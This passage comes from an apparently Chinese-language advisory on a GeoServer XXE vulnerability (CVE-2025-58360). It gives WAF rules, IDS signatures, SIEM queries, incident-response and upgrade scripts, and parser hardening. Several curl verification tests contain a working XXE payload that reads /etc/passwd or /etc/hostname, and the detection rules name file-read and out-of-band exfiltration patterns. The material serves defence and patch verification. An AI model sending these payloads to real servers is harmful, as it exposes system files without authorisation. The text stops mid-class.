logdata:'%{MATCHED_VAR}',\
severity:CRITICAL,\
chain"
SecRule REQUEST_BODY "@rx (?i)SYSTEM\s+[\"']file://" \
"t:none"
# 规则4: 检测XInclude
SecRule REQUEST_URI "@contains /geoserver/wms" \
"id:58360004,\
phase:2,\
t:none,t:lowercase,\
deny,\
status:403,\
log,\
msg:'CVE-2025-58360: XInclude detected',\
severity:CRITICAL,\
chain"
SecRule REQUEST_BODY "@rx (?i)xmlns:xi.*XInclude" \
"t:none"
# 规则5: 速率限制
SecAction \
"id:58360005,\
phase:1,\
nolog,\
pass,\
initcol:ip=%{REMOTE_ADDR},\
setvar:ip.xxe_counter=+1,\
expirevar:ip.xxe_counter=60"
SecRule IP:XXE_COUNTER "@gt 10" \
"id:58360006,\
phase:1,\
deny,\
status:429,\
msg:'Rate limit exceeded for potential XXE attacks',\
severity:WARNING"
Nginx配置:
# /etc/nginx/conf.d/geoserver-protection.conf
# 基础保护
location /geoserver/wms {
# 检测恶意XML模式
if ($request_body ~* "<!DOCTYPE|<!ENTITY|SYSTEM\s+[\"']file://") {
return 403 "XXE attack blocked (CVE-2025-58360)";
}
# 内容类型限制
if ($content_type !~* "application/xml|text/xml") {
set $block_xxe 1;
}
# 请求体大小限制
client_max_body_size 100k;
# 速率限制
limit_req zone=wms_zone burst=5 nodelay;
limit_req_status 429;
# 代理到后端
proxy_pass http://geoserver:8080;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
# 速率限制区域定义
limit_req_zone $binary_remote_addr zone=wms_zone:10m rate=10r/m;
# 日志记录
access_log /var/log/nginx/geoserver-wms.log combined;
error_log /var/log/nginx/geoserver-wms-error.log warn;
Apache配置:
# /etc/apache2/conf-available/geoserver-protection.conf
<Location /geoserver/wms>
# ModSecurity规则启用
SecRuleEngine On
Include /etc/modsecurity/cve-2025-58360.conf
# 基础过滤
<If "%{REQUEST_BODY} =~ /<!DOCTYPE|<!ENTITY|SYSTEM.*file:\/\//i">
Require all denied
</If>
# 速率限制(需要mod_ratelimit)
SetOutputFilter RATE_LIMIT
SetEnv rate-limit 400
# 代理到后端
ProxyPass http://localhost:8080/geoserver/wms
ProxyPassReverse http://localhost:8080/geoserver/wms
</Location>
# 启用配置
# sudo a2enconf geoserver-protection
# sudo systemctl reload apache2
验证WAF规则:
# 测试恶意payload是否被阻断
curl -X POST "http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
# 预期结果: 403 Forbidden或其他拒绝响应
# 如果返回200或包含文件内容,说明WAF未生效
11.1.3 网络隔离
基于我们的复现经验,限制网络访问可显著降低攻击面:
iptables规则:
#!/bin/bash
# geoserver-firewall.sh - 配置GeoServer访问控制
# 清除现有规则
iptables -F INPUT
iptables -F OUTPUT
# 默认策略
iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
iptables -P FORWARD DROP
# 允许本地回环
iptables -A INPUT -i lo -j ACCEPT
# 允许已建立连接
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# 仅允许可信IP访问GeoServer
TRUSTED_IPS=(
"192.168.1.0/24" # 内网
"10.0.0.0/8" # VPN
"203.0.113.10" # 管理员IP
)
for ip in "${TRUSTED_IPS[@]}"; do
iptables -A INPUT -p tcp --dport 8080 -s "$ip" -j ACCEPT
done
# 记录被拒绝的连接
iptables -A INPUT -p tcp --dport 8080 -j LOG --log-prefix "GEOSERVER-BLOCKED: "
iptables -A INPUT -p tcp --dport 8080 -j DROP
# 保存规则
iptables-save > /etc/iptables/rules.v4
echo "Firewall rules applied successfully"
Docker网络隔离:
# docker-compose.yml - 网络隔离配置
services:
geoserver:
image: kartoza/geoserver:2.26.2
networks:
- internal
- dmz
ports:
- "127.0.0.1:8080:8080" # 仅本地访问
nginx-proxy:
image: nginx:alpine
networks:
- dmz
- public
ports:
- "443:443" # 仅HTTPS
volumes:
- ./nginx.conf:/etc/nginx/nginx.conf:ro
networks:
internal:
driver: bridge
internal: true # 无外网访问
dmz:
driver: bridge
ipam:
config:
- subnet: 172.20.0.0/16
public:
driver: bridge
云平台安全组(AWS示例):
# AWS Security Group配置
aws ec2 create-security-group \
--group-name geoserver-sg \
--description "GeoServer CVE-2025-58360 Protection" \
--vpc-id vpc-xxxxx
# 仅允许内部访问
aws ec2 authorize-security-group-ingress \
--group-id sg-xxxxx \
--protocol tcp \
--port 8080 \
--source-group sg-internal-xxxxx
# 移除公网访问
aws ec2 revoke-security-group-ingress \
--group-id sg-xxxxx \
--protocol tcp \
--port 8080 \
--cidr 0.0.0.0/0
11.2 检测与监控
基于我们的攻击特征分析,部署以下检测机制:
11.2.1 日志监控
监控脚本:
#!/bin/bash
# geoserver-monitor.sh - 实时监控XXE攻击尝试
LOG_FILE="/var/log/geoserver/geoserver.log"
ALERT_EMAIL="[email protected]"
# XXE攻击特征
XXE_PATTERNS=(
"<!DOCTYPE"
"<!ENTITY"
"SYSTEM.*file://"
"java.io.FileNotFoundException"
"Unknown layer:.*root:x:" # /etc/passwd泄露特征
)
# 监控函数
monitor_logs() {
tail -F "$LOG_FILE" | while read line; do
for pattern in "${XXE_PATTERNS[@]}"; do
if echo "$line" | grep -iE "$pattern" > /dev/null; then
alert_security "$line" "$pattern"
fi
done
done
}
# 告警函数
alert_security() {
local log_line="$1"
local pattern="$2"
local timestamp=$(date "+%Y-%m-%d %H:%M:%S")
# 记录到安全日志
echo "[$timestamp] XXE ATTEMPT DETECTED - Pattern: $pattern" >> /var/log/geoserver/security.log
echo "Log: $log_line" >> /var/log/geoserver/security.log
# 发送邮件告警
echo "XXE Attack Detected on GeoServer
Time: $timestamp
Pattern: $pattern
Log: $log_line
Immediate action required!" | mail -s "CRITICAL: CVE-2025-58360 Attack Detected" "$ALERT_EMAIL"
# 触发自动阻断(可选)
# auto_block_ip "$log_line"
}
# 启动监控
echo "Starting GeoServer XXE monitoring..."
monitor_logs
SIEM集成(Splunk):
# Splunk查询 - 检测CVE-2025-58360攻击
index=geoserver sourcetype=geoserver:access
| search uri_path="/geoserver/wms" method=POST
| regex _raw="(?i)(<!DOCTYPE|<!ENTITY|SYSTEM\s+[\"']file://)"
| eval attack_type=case(
match(_raw, "(?i)<!DOCTYPE"), "DOCTYPE Declaration",
match(_raw, "(?i)<!ENTITY"), "ENTITY Declaration",
match(_raw, "(?i)SYSTEM\s+[\"']file://"), "File Access Attempt",
true(), "Unknown"
)
| stats count by src_ip, attack_type, _time
| where count > 0
| eval severity="CRITICAL"
| eval cve="CVE-2025-58360"
| table _time, src_ip, attack_type, count, severity, cve
| sort -_time
ELK Stack配置:
# Logstash filter - geoserver-xxe.conf
filter {
if [type] == "geoserver" {
# 解析访问日志
grok {
match => { "message" => "%{IP:client_ip} .* \"%{WORD:method} %{URIPATHPARAM:uri_path} HTTP/%{NUMBER:http_version}\" %{NUMBER:status_code}" }
}
# 检测XXE特征
if [uri_path] =~ /\/geoserver\/wms/ and [method] == "POST" {
if [message] =~ /(?i)(<!DOCTYPE|<!ENTITY|SYSTEM.*file:\/\/)/ {
mutate {
add_field => {
"security_alert" => "CVE-2025-58360 XXE Attempt"
"severity" => "CRITICAL"
}
add_tag => [ "xxe_attack", "cve-2025-58360" ]
}
}
}
# 检测成功利用特征
if [message] =~ /Unknown layer:.*root:x:/ {
mutate {
add_field => {
"security_alert" => "CVE-2025-58360 Successful Exploitation"
"severity" => "CRITICAL"
"data_leak" => "passwd_file"
}
add_tag => [ "xxe_success", "data_breach" ]
}
}
}
}
output {
if "xxe_attack" in [tags] or "xxe_success" in [tags] {
# 发送到安全团队
email {
to => "[email protected]"
subject => "CRITICAL: GeoServer XXE Attack Detected"
body => "Alert: %{security_alert}\nSource IP: %{client_ip}\nTime: %{@timestamp}"
}
# 输出到Elasticsearch
elasticsearch {
hosts => ["localhost:9200"]
index => "security-alerts-%{+YYYY.MM.dd}"
}
}
}
Kibana仪表板:
{
"title": "CVE-2025-58360 Attack Dashboard",
"panels": [
{
"title": "XXE Attack Timeline",
"type": "line",
"query": "tags:xxe_attack OR tags:xxe_success"
},
{
"title": "Attack Source IPs",
"type": "pie",
"query": "security_alert:*CVE-2025-58360*",
"field": "client_ip"
},
{
"title": "Attack Types Distribution",
"type": "bar",
"field": "security_alert"
},
{
"title": "Successful Exploitations",
"type": "metric",
"query": "tags:xxe_success"
}
]
}
11.2.2 入侵检测
Snort规则:
# /etc/snort/rules/cve-2025-58360.rules
# 规则1: 检测DOCTYPE in POST to WMS
alert tcp any any -> any 8080 (
msg:"CVE-2025-58360 XXE - DOCTYPE in WMS request";
flow:to_server,established;
content:"POST"; http_method;
content:"/geoserver/wms"; http_uri;
content:"<!DOCTYPE"; nocase; http_client_body;
classtype:web-application-attack;
sid:5836001;
rev:1;
metadata:cve CVE-2025-58360;
reference:url,github.com/advisories/GHSA-fjf5-xgmq-5525;
)
# 规则2: 检测ENTITY声明
alert tcp any any -> any 8080 (
msg:"CVE-2025-58360 XXE - ENTITY declaration";
flow:to_server,established;
content:"POST"; http_method;
content:"/geoserver/wms"; http_uri;
content:"<!ENTITY"; nocase; http_client_body;
classtype:web-application-attack;
sid:5836002;
rev:1;
metadata:cve CVE-2025-58360;
)
# 规则3: 检测file://协议
alert tcp any any -> any 8080 (
msg:"CVE-2025-58360 XXE - File URI access attempt";
flow:to_server,established;
content:"POST"; http_method;
content:"/geoserver/wms"; http_uri;
pcre:"/SYSTEM\s+[\"']file:\/\//i";
classtype:web-application-attack;
sid:5836003;
rev:1;
metadata:cve CVE-2025-58360;
)
# 规则4: 检测成功利用(响应特征)
alert tcp any 8080 -> any any (
msg:"CVE-2025-58360 XXE - Successful file read detected";
flow:to_client,established;
content:"Unknown layer"; http_stat_msg;
pcre:"/root:x:[0-9]+:[0-9]+:/";
classtype:successful-admin;
sid:5836004;
rev:1;
priority:1;
metadata:cve CVE-2025-58360;
)
# 规则5: 检测OOB XXE
alert tcp any any -> any any (
msg:"CVE-2025-58360 XXE - OOB data exfiltration";
flow:to_server,established;
content:"POST"; http_method;
pcre:"/<!ENTITY\s+%\s+\w+\s+SYSTEM/i";
classtype:web-application-attack;
sid:5836005;
rev:1;
metadata:cve CVE-2025-58360;
)
Suricata规则:
# /etc/suricata/rules/cve-2025-58360.rules
# HTTP请求检测
alert http any any -> any any (
msg:"CVE-2025-58360 GeoServer XXE Attack";
flow:to_server;
http.method; content:"POST";
http.uri; content:"/geoserver/wms";
http.request_body; content:"<!DOCTYPE"; nocase;
http.request_body; content:"<!ENTITY"; nocase;
classtype:web-application-attack;
sid:20255836001;
rev:1;
metadata:cve CVE-2025-58360;
)
# 响应数据泄露检测
alert http any any -> any any (
msg:"CVE-2025-58360 Data Leak - passwd file";
flow:to_client;
http.response_body; content:"Unknown layer";
http.response_body; pcre:"/root:x:[0-9]+/";
classtype:policy-violation;
sid:20255836002;
rev:1;
priority:1;
metadata:cve CVE-2025-58360, impact CRITICAL;
)
11.3 应急响应
11.3.1 事件响应流程
发现攻击后的应急响应步骤:
#!/bin/bash
# incident-response.sh - CVE-2025-58360攻击应急响应
INCIDENT_ID="CVE-2025-58360-$(date +%Y%m%d-%H%M%S)"
INCIDENT_DIR="/var/incident-response/$INCIDENT_ID"
echo "=== CVE-2025-58360 Incident Response ==="
echo "Incident ID: $INCIDENT_ID"
# 1. 隔离系统
isolate_system() {
echo "[1/6] Isolating affected system..."
# 阻断外部访问
iptables -I INPUT 1 -p tcp --dport 8080 -j DROP
# 停止GeoServer(可选)
# systemctl stop geoserver
echo "System isolated"
}
# 2. 保存证据
collect_evidence() {
echo "[2/6] Collecting forensic evidence..."
mkdir -p "$INCIDENT_DIR"/{logs,memory,network,config}
# 保存日志
cp -r /var/log/geoserver "$INCIDENT_DIR/logs/"
cp /var/log/nginx/*.log "$INCIDENT_DIR/logs/"
# 保存网络连接
netstat -tunap > "$INCIDENT_DIR/network/netstat.txt"
ss -tunap > "$INCIDENT_DIR/network/ss.txt"
# 保存进程信息
ps aux > "$INCIDENT_DIR/network/processes.txt"
# 保存配置
cp -r /opt/geoserver/data_dir "$INCIDENT_DIR/config/"
# 内存dump(可选)
# gcore $(pgrep -f geoserver) -o "$INCIDENT_DIR/memory/geoserver"
echo "Evidence collected in $INCIDENT_DIR"
}
# 3. 分析攻击
analyze_attack() {
echo "[3/6] Analyzing attack patterns..."
# 提取攻击IP
grep -i "<!DOCTYPE\|<!ENTITY" "$INCIDENT_DIR/logs/geoserver.log" | \
awk '{print $1}' | sort -u > "$INCIDENT_DIR/attacker_ips.txt"
# 提取被泄露的文件
grep -i "Unknown layer:" "$INCIDENT_DIR/logs/geoserver.log" | \
sed 's/.*Unknown layer: //' > "$INCIDENT_DIR/leaked_data.txt"
# 统计攻击次数
grep -c "<!DOCTYPE\|<!ENTITY" "$INCIDENT_DIR/logs/geoserver.log" \
> "$INCIDENT_DIR/attack_count.txt"
echo "Attack analysis completed"
}
# 4. 阻断攻击者
block_attackers() {
echo "[4/6] Blocking attacker IPs..."
while read ip; do
# 阻断IP
iptables -I INPUT 1 -s "$ip" -j DROP
# 记录
echo "$(date): Blocked $ip" >> "$INCIDENT_DIR/blocked_ips.log"
done < "$INCIDENT_DIR/attacker_ips.txt"
# 保存iptables规则
iptables-save > /etc/iptables/rules.v4
echo "Attackers blocked"
}
# 5. 生成报告
generate_report() {
echo "[5/6] Generating incident report..."
cat > "$INCIDENT_DIR/INCIDENT_REPORT.txt" << EOF
========================================
CVE-2025-58360 Incident Response Report
========================================
Incident ID: $INCIDENT_ID
Date/Time: $(date)
Analyst: $(whoami)
SUMMARY
-------
GeoServer XXE vulnerability exploitation detected and contained.
TIMELINE
--------
$(grep -h "<!DOCTYPE\|<!ENTITY\|Unknown layer:" "$INCIDENT_DIR/logs/geoserver.log" | head -20)
ATTACKER INFORMATION
-------------------
Unique IPs: $(wc -l < "$INCIDENT_DIR/attacker_ips.txt")
Attack Count: $(cat "$INCIDENT_DIR/attack_count.txt")
Top Attacker IPs:
$(cat "$INCIDENT_DIR/attacker_ips.txt")
COMPROMISED DATA
----------------
$(cat "$INCIDENT_DIR/leaked_data.txt" | head -50)
ACTIONS TAKEN
-------------
1. System isolated
2. Evidence collected
3. Attackers blocked
4. Logs analyzed
RECOMMENDATIONS
---------------
1. Upgrade GeoServer to 2.26.2+
2. Review all system files accessed during attack window
3. Rotate credentials if database config was accessed
4. Implement WAF rules
5. Enable enhanced monitoring
EVIDENCE LOCATION
-----------------
$INCIDENT_DIR
EOF
echo "Report generated: $INCIDENT_DIR/INCIDENT_REPORT.txt"
}
# 6. 通知
notify_team() {
echo "[6/6] Notifying security team..."
mail -s "CRITICAL: CVE-2025-58360 Incident $INCIDENT_ID" \
[email protected] < "$INCIDENT_DIR/INCIDENT_REPORT.txt"
echo "Notification sent"
}
# 执行应急响应
main() {
isolate_system
collect_evidence
analyze_attack
block_attackers
generate_report
notify_team
echo ""
echo "=== Incident Response Completed ==="
echo "Incident ID: $INCIDENT_ID"
echo "Evidence: $INCIDENT_DIR"
echo "Report: $INCIDENT_DIR/INCIDENT_REPORT.txt"
}
main
11.3.2 恢复检查清单
攻击后的系统恢复检查:
# CVE-2025-58360 Recovery Checklist
## 立即行动 (0-4小时)
- [ ] 隔离受影响系统
- [ ] 保存所有日志和证据
- [ ] 识别并阻断攻击者IP
- [ ] 升级GeoServer至安全版本
- [ ] 更改所有管理员密码
## 短期行动 (4-24小时)
- [ ] 审计所有可能被访问的文件
- [ ] /etc/passwd
- [ ] /opt/geoserver/data_dir/*
- [ ] 应用程序配置文件
- [ ] 数据库连接配置
- [ ] 如发现数据库凭据泄露,立即轮换
- [ ] 检查是否有其他系统被横向渗透
- [ ] 部署WAF规则
- [ ] 启用增强监控
## 中期行动 (1-7天)
- [ ] 完整的漏洞扫描
- [ ] 渗透测试验证修复有效性
- [ ] 实施网络分段
- [ ] 部署IDS/IPS
- [ ] 更新安全基线
## 长期行动 (1-4周)
- [ ] 全面安全审计
- [ ] 安全意识培训
- [ ] 更新应急响应流程
- [ ] 建立持续监控机制
- [ ] 定期安全评估
## 验证修复
```bash
# 验证GeoServer已升级
curl -s http://localhost:8080/geoserver/web/ | grep -i version
# 测试XXE是否已修复(应返回错误)
curl -X POST "http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
# 预期结果: DOCTYPE被拒绝或外部实体未被解析
# 如果仍然返回文件内容,修复失败!
# 验证WAF规则
curl -X POST "http://localhost:8080/geoserver/wms..." -d '<!DOCTYPE...'
# 预期结果: 403 Forbidden
# 验证网络隔离
nmap -p 8080 your-geoserver-ip
# 预期结果: filtered或closed(非open)
12. 修复建议
12.1 官方补丁分析
12.1.1 补丁版本
根据官方公告,GeoServer项目发布了以下修复版本:
| 版本系列 | 漏洞版本 | 修复版本 | 发布日期 |
|---|---|---|---|
| 2.28.x | N/A | 2.28.1 | 2025-11-25 |
| 2.27.x | N/A | 2.27.0 | 2025-11-25 |
| 2.26.x | 2.26.0 - 2.26.1 | 2.26.2 | 2025-11-25 |
| 2.25.x | < 2.25.6 | 2.25.6 | 2025-11-25 |
| 2.24.x及以下 | 全部 | EOL(停止支持) | - |
我们的复现使用的2.26.1版本确实存在漏洞,官方2.26.2+版本已修复。
12.1.2 修复内容
根据GitHub Security Advisory GHSA-fjf5-xgmq-5525和我们的技术分析,修复主要包括:
XML解析器安全加固
禁用DTD处理:
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
禁用外部实体解析:
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
SLD解析安全增强
输入验证:
检查XML文档结构
拒绝包含DOCTYPE的文档
限制文档大小
错误处理改进
信息泄露防护:
不在错误消息中包含实体内容
通用化错误响应
记录详细错误到服务器日志而非返回给客户端
12.1.3 补丁下载
官方下载地址:
# GeoServer 2.28.1 (推荐)
wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.28.1/geoserver-2.28.1-bin.zip
# GeoServer 2.27.0
wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.27.0/geoserver-2.27.0-bin.zip
# GeoServer 2.26.2
wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.26.2/geoserver-2.26.2-bin.zip
# GeoServer 2.25.6
wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.25.6/geoserver-2.25.6-bin.zip
# 验证SHA256
sha256sum geoserver-*.zip
Maven依赖更新:
<dependency>
<groupId>org.geoserver</groupId>
<artifactId>gs-wms</artifactId>
<version>2.26.2</version> <!-- 或更高版本 -->
</dependency>
Docker镜像更新:
# 官方镜像
services:
geoserver:
image: kartoza/geoserver:2.26.2 # 修复版本
# 或
image: kartoza/geoserver:2.28.1 # 最新版本
12.2 升级指南
12.2.1 升级前准备
升级前检查清单:
#!/bin/bash
# pre-upgrade-check.sh
echo "=== Pre-Upgrade Checklist ==="
# 1. 检查当前版本
echo "[1/8] Checking current version..."
CURRENT_VERSION=$(curl -s http://localhost:8080/geoserver/web/ | grep -oP 'Version \K[0-9.]+' | head -1)
echo "Current version: $CURRENT_VERSION"
if [[ "$CURRENT_VERSION" < "2.25.6" ]] || [[ "$CURRENT_VERSION" == "2.26.0" ]] || [[ "$CURRENT_VERSION" == "2.26.1" ]]; then
echo "VULNERABLE - Upgrade required!"
else
echo "Already patched"
fi
# 2. 备份检查
echo "[2/8] Checking backup..."
BACKUP_DIR="/backup/geoserver-$(date +%Y%m%d)"
mkdir -p "$BACKUP_DIR"
# 3. 磁盘空间
echo "[3/8] Checking disk space..."
AVAILABLE_SPACE=$(df -BG /opt | tail -1 | awk '{print $4}' | sed 's/G//')
if [ "$AVAILABLE_SPACE" -lt 5 ]; then
echo "WARNING: Less than 5GB available"
else
echo "Disk space OK: ${AVAILABLE_SPACE}GB available"
fi
# 4. 服务依赖
echo "[4/8] Checking service dependencies..."
systemctl list-dependencies geoserver
# 5. 数据库连接
echo "[5/8] Checking database connections..."
netstat -tunap | grep $(pgrep -f geoserver) | grep ESTABLISHED
# 6. 当前配置
echo "[6/8] Documenting current configuration..."
cp -r /opt/geoserver/data_dir "$BACKUP_DIR/"
ls -lah /opt/geoserver/data_dir > "$BACKUP_DIR/config-inventory.txt"
# 7. 活跃用户
echo "[7/8] Checking active users..."
# 需要从GeoServer日志或监控系统获取
# 8. 维护窗口确认
echo "[8/8] Maintenance window planning..."
echo "Estimated downtime: 10-30 minutes"
echo "Recommended time: Off-peak hours"
echo ""
echo "Pre-upgrade check completed"
echo "Backup location: $BACKUP_DIR"
12.2.2 标准升级流程
生产环境升级步骤:
#!/bin/bash
# upgrade-geoserver.sh - 生产环境升级脚本
set -e # 遇错即停
GEOSERVER_HOME="/opt/geoserver"
DATA_DIR="$GEOSERVER_HOME/data_dir"
BACKUP_DIR="/backup/geoserver-$(date +%Y%m%d-%H%M%S)"
NEW_VERSION="2.26.2"
echo "=== GeoServer Upgrade to $NEW_VERSION ==="
# 第1步: 完整备份
step1_backup() {
echo "[Step 1/10] Creating backup..."
mkdir -p "$BACKUP_DIR"
# 备份安装目录
tar czf "$BACKUP_DIR/geoserver-install.tar.gz" "$GEOSERVER_HOME" \
--exclude="$GEOSERVER_HOME/logs" \
--exclude="$GEOSERVER_HOME/temp"
# 备份数据目录
tar czf "$BACKUP_DIR/geoserver-data.tar.gz" "$DATA_DIR"
# 备份数据库(如使用外部数据库)
# mysqldump -u geoserver -p geoserverdb > "$BACKUP_DIR/database.sql"
# 备份系统配置
cp /etc/systemd/system/geoserver.service "$BACKUP_DIR/" 2>/dev/null || true
echo "Backup completed: $BACKUP_DIR"
}
# 第2步: 健康检查
step2_healthcheck() {
echo "[Step 2/10] Pre-upgrade health check..."
# 检查服务状态
systemctl is-active geoserver && echo "Service: Running" || echo "Service: Stopped"
# 检查端口
netstat -tuln | grep :8080 && echo "Port 8080: Listening" || echo "Port 8080: Not listening"
# 测试WMS服务
curl -f -s -o /dev/null http://localhost:8080/geoserver/wms?service=WMS&request=GetCapabilities \
&& echo "WMS: OK" || echo "WMS: Failed"
}
# 第3步: 通知用户
step3_notify() {
echo "[Step 3/10] Notifying users..."
# 在GeoServer界面显示维护通知(如果有自定义页面)
# 或通过邮件/Slack等通知
echo "Notifications sent"
}
# 第4步: 停止服务
step4_stop() {
echo "[Step 4/10] Stopping GeoServer..."
systemctl stop geoserver
# 等待进程完全停止
while pgrep -f geoserver > /dev/null; do
sleep 1
done
echo "GeoServer stopped"
}
# 第5步: 下载新版本
step5_download() {
echo "[Step 5/10] Downloading GeoServer $NEW_VERSION..."
cd /tmp
wget -q --show-progress \
"https://sourceforge.net/projects/geoserver/files/GeoServer/$NEW_VERSION/geoserver-$NEW_VERSION-bin.zip"
# 验证SHA256(如果官方提供)
# echo "expected_sha256 geoserver-$NEW_VERSION-bin.zip" | sha256sum -c
echo "Download completed"
}
# 第6步: 安装新版本
step6_install() {
echo "[Step 6/10] Installing new version..."
cd /tmp
unzip -q "geoserver-$NEW_VERSION-bin.zip"
# 移除旧版本可执行文件(保留data_dir)
rm -rf "$GEOSERVER_HOME/bin" \
"$GEOSERVER_HOME/lib" \
"$GEOSERVER_HOME/webapps" \
"$GEOSERVER_HOME/resources"
# 安装新版本
cp -r "geoserver-$NEW_VERSION"/* "$GEOSERVER_HOME/"
# 恢复data_dir(通常自动保留,这里确保)
# 新版本不应覆盖data_dir
echo "Installation completed"
}
# 第7步: 权限修复
step7_permissions() {
echo "[Step 7/10] Fixing permissions..."
chown -R geoserver:geoserver "$GEOSERVER_HOME"
chmod -R 755 "$GEOSERVER_HOME/bin"
chmod -R 644 "$GEOSERVER_HOME/webapps"
echo "Permissions fixed"
}
# 第8步: 启动服务
step8_start() {
echo "[Step 8/10] Starting GeoServer..."
systemctl start geoserver
# 等待服务启动
echo "Waiting for service to start..."
for i in {1..60}; do
if curl -f -s -o /dev/null http://localhost:8080/geoserver/web/; then
echo "GeoServer started successfully"
return 0
fi
sleep 2
done
echo "ERROR: GeoServer failed to start"
return 1
}
# 第9步: 验证升级
step9_verify() {
echo "[Step 9/10] Verifying upgrade..."
# 检查版本
NEW_RUNNING_VERSION=$(curl -s http://localhost:8080/geoserver/web/ | grep -oP 'Version \K[0-9.]+' | head -1)
echo "Running version: $NEW_RUNNING_VERSION"
if [ "$NEW_RUNNING_VERSION" == "$NEW_VERSION" ]; then
echo "Version verified: $NEW_VERSION"
else
echo "ERROR: Version mismatch"
return 1
fi
# 测试WMS服务
if curl -f -s -o /dev/null http://localhost:8080/geoserver/wms?service=WMS&request=GetCapabilities; then
echo "WMS service: OK"
else
echo "ERROR: WMS service failed"
return 1
fi
# 测试XXE已修复
echo "Testing XXE vulnerability..."
XXE_RESPONSE=$(curl -s -X POST \
"http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>')
# 检查响应中不应包含文件内容
if echo "$XXE_RESPONSE" | grep -q "DOCTYPE\|disallowed\|denied"; then
echo "XXE vulnerability: FIXED"
elif echo "$XXE_RESPONSE" | grep -qE "root:|Unknown layer: [a-f0-9]{12}"; then
echo "ERROR: XXE vulnerability still present!"
return 1
else
echo "XXE vulnerability: Likely fixed (DOCTYPE rejected)"
fi
}
# 第10步: 清理
step10_cleanup() {
echo "[Step 10/10] Cleaning up..."
rm -rf "/tmp/geoserver-$NEW_VERSION"
rm "/tmp/geoserver-$NEW_VERSION-bin.zip"
echo "Cleanup completed"
}
# 主函数
main() {
echo "Starting upgrade process..."
echo "This will upgrade GeoServer to version $NEW_VERSION"
echo "Backup will be saved to: $BACKUP_DIR"
echo ""
read -p "Continue? (yes/no): " confirm
if [ "$confirm" != "yes" ]; then
echo "Upgrade cancelled"
exit 0
fi
step1_backup
step2_healthcheck
step3_notify
step4_stop
step5_download
step6_install
step7_permissions
step8_start
if step9_verify; then
step10_cleanup
echo ""
echo "=== Upgrade Successful ==="
echo "GeoServer upgraded to $NEW_VERSION"
echo "XXE vulnerability CVE-2025-58360 fixed"
echo "Backup location: $BACKUP_DIR"
else
echo ""
echo "=== Upgrade Failed ==="
echo "Rolling back to backup..."
rollback
fi
}
# 回滚函数
rollback() {
echo "Stopping new version..."
systemctl stop geoserver
echo "Restoring from backup..."
tar xzf "$BACKUP_DIR/geoserver-install.tar.gz" -C /
tar xzf "$BACKUP_DIR/geoserver-data.tar.gz" -C /
echo "Starting old version..."
systemctl start geoserver
echo "Rollback completed"
}
# 执行
main
Docker环境升级:
#!/bin/bash
# docker-upgrade.sh
echo "=== Docker GeoServer Upgrade ==="
# 1. 备份数据卷
echo "[1/5] Backing up data volume..."
docker run --rm \
-v geoserver-data:/data \
-v $(pwd):/backup \
alpine tar czf /backup/geoserver-data-backup-$(date +%Y%m%d).tar.gz /data
# 2. 停止旧容器
echo "[2/5] Stopping old container..."
docker-compose down
# 3. 拉取新镜像
echo "[3/5] Pulling new image..."
docker-compose pull
# 4. 启动新版本
echo "[4/5] Starting new version..."
docker-compose up -d
# 5. 验证
echo "[5/5] Verifying..."
sleep 10
# 检查容器状态
if docker ps | grep -q geoserver; then
echo "Container: Running"
else
echo "ERROR: Container not running"
exit 1
fi
# 检查版本
NEW_VERSION=$(docker exec geoserver-secure cat /opt/geoserver/version.txt 2>/dev/null || echo "Unknown")
echo "New version: $NEW_VERSION"
# 测试XXE
XXE_TEST=$(curl -s -X POST \
"http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><StyledLayerDescriptor version="1.0.0"><NamedLayer><Name>&xxe;</Name></NamedLayer></StyledLayerDescriptor>')
if echo "$XXE_TEST" | grep -qE "DOCTYPE.*disallowed|Entity.*denied"; then
echo "XXE vulnerability: FIXED"
else
echo "XXE test result: $XXE_TEST"
fi
echo ""
echo "Upgrade completed!"
12.3 配置加固
12.3.1 XML解析器安全配置
即使升级到安全版本,也应确保XML解析器使用最安全的配置:
Java安全配置:
// SecureXMLParserUtils.java
package org.example.geoserver.security;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLInputFactory;
import org.xml.sax.SAXNotRecognizedException;
import org.xml.sax.SAXNotSupportedException;
public class SecureXMLParserUtils {
/**
